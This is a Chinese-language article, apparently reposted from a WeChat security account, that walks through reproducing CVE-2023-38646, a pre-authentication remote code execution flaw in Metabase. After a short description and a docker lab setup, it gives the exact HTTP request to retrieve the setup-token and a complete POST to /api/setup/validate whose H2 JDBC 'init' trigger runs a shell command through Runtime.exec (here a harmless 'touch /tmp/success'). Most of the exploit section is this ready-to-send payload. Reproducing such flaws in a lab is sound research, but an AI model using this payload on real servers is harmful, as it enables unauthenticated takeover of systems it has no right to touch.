Metabase 是一个开源数据分析平台,0.46.6.1 之前的开源 Metabase 和 1.46.6.1 之前的 Metabase Enterprise 允许未经身份验证的攻击者以服务器的权限级别在服务器上执行任意命令。此问题是由设置请求中的 JDBC url 攻击引起的。
脆弱环境
执行以下命令启动Metabase数据库服务器0.46.6:
docker compose up -d
服务器启动后,您可以浏览查看http://your-ip:3000安装说明,如下所示:
填写您的信息,并跳过数据源表单。
构造:
首先,使用以下请求来检索setup-token:
GET /api/session/properties HTTP/1.1
Host: localhost:3000
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.110 Safari/537.36
Connection: close
Cache-Control: max-age=0
该漏洞只能通过获取此设置令牌来利用。
其次,将您的请求替换[setup-token]为以下请求然后发送:
POST /api/setup/validate HTTP/1.1
Host: localhost:3000
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.110 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/json
Content-Length: 739
{
"token": "[setup-token]",
"details":
{
"is_on_demand": false,
"is_full_sync": false,
"is_sample": false,
"cache_ttl": null,
"refingerprint": false,
"auto_run_queries": true,
"schedules":
{},
"details":
{
"db": "zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;",
"advanced-options": false,
"ssl": true,
"init": "CREATE TRIGGER shell3 BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascriptu000Au0009java.lang.Runtime.getRuntime().exec('touch /tmp/success')u000A$$"
},
"name": "an-sec-research-team",
"engine": "h2"
}
}
可以看到,touch /tmp/success已经执行成功:
参考:
https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/
https://blog.calif.io/p/reproducing-cve-2023-38646-metabase
https://mp.weixin.qq.com/s/MgfIyq0OJwnKOUF2kBB7TA
感谢您抽出
.
.
来阅读本文
点它,分享点赞在看都在这里
原文始发于微信公众号(Ots安全):Metabase Pre-Auth JDBC远程代码执行漏洞 (CVE-2023-38646)
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论